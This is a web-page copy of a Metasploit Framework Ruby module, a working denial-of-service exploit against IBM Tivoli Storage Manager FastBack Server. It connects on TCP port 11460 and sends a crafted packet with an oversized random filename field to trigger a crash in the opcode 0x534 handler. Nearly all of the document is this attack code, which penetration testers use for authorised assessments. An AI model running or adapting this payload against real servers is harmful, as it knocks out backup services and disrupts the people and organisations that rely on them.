CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/misc/ibm_tsm_dos.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info={})

11
    super(update_info(info,

12
      'Name'           => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",

13
      'Description'    => %q{

14
          This module exploits a denial of service condition present in IBM Tivoli Storage Manager

15
          FastBack Server when dealing with packets triggering the opcode 0x534 handler.

16
        },

17
      'License'        => MSF_LICENSE,

18
      'Author'         =>

19
        [

20
          'Gianni Gnesa',                              # Public disclosure/Proof of Concept

21
          'William Webb <william_webb[at]rapid7.com>', # Metasploit

22
        ],

23
      'References'     =>

24
        [

25
          ['EDB', '38979'],

26
          ['OSVDB', '132307']

27
        ],

28
      'DisclosureDate' => '2015-12-15',

29
    ))

30


31
    register_options(

32
      [

33
        Opt::RPORT(11460)

34
      ])

35
  end

36


37
  def tv_pkt(opcode, p1="", p2="", p3="")

38
    buf = Rex::Text.rand_text_alpha(0x0C)

39
    buf += [opcode].pack("V")

40
    buf += [0x00].pack("V")

41
    buf += [p1.length].pack("V")

42
    buf += [p1.length].pack("V")

43
    buf += [p2.length].pack("V")

44
    buf += [p1.length + p2.length].pack("V")

45
    buf += [p3.length].pack("V")

46


47
    buf += Rex::Text.rand_text_alpha(0x08)

48


49
    buf += p1

50
    buf += p2

51
    buf += p3

52


53
    pkt = [buf.length].pack("N")

54
    pkt << buf

55


56
    return pkt

57
  end

58


59
  def run

60
    target_opcode = 0x534

61
    connect

62
    print_status("Connected to: #{rhost} port: #{rport}")

63
    print_status("Sending malicious packet")

64


65
    p = tv_pkt(target_opcode,

66
               "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],

67
               Rex::Text.rand_text_alpha(0x60),

68
               Rex::Text.rand_text_alpha(0x60)

69
              )

70


71
    sock.put(p)

72
    print_status("Packet sent!")

73
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex

74
    print_error("Exploit failed: #{ex.class} #{ex.message}")

75
    elog(ex)

76
  ensure

77
    disconnect

78
  end

79
end

80


81